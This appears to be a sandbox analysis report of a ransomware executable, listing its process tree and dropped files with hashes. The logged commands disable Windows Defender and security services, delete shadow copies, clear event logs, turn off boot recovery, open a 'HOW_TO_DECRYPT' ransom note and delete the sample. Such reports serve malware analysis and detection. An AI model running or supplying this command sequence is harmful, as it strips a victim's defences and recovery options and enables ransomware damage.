PID 1540 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\notepad.exe

notepad.exe C:\vyS2_HOW_TO_DECRYPT.txt

C:\Windows\system32\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

C:\Windows\system32\PING.EXE

ping.exe -n 5 127.0.0.1

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 aea5a2d964838b8e28ee4017dba48ea8
SHA1 94e56266d78088b8f8bfbb3dbb98c0a5bb57172a
SHA256 9ebe034d15d89f89bc9267e873191944c30917f85aa105c825e4a865854023e7
SHA512 8ce1cf765b234b8c0ed557badc5466cfc90b4c25e29b10d8d9a026a58f30a8665935b424d4c8e3b91a0319f3f8cd039b9c60bda4d1ef305688a58344784abac4

C:\vyS2_HOW_TO_DECRYPT.txt

MD5 ee121b1deb962e44600cf271791ebd82
SHA1 1c5b22c8856b15843ac236159b558e1fdca8dc04
SHA256 34ed6223e7de680957e45d9fbf0117506a2820990380a279a1272465f49ee811
SHA512 f5136d2bd9e539af874aff551b600d760b3867ad88c250fafe5a2e1f10eb0a673a115710d43074649ede4f5c6401be3aa7fdce70fd4c777a8aa7ebb83af31d4a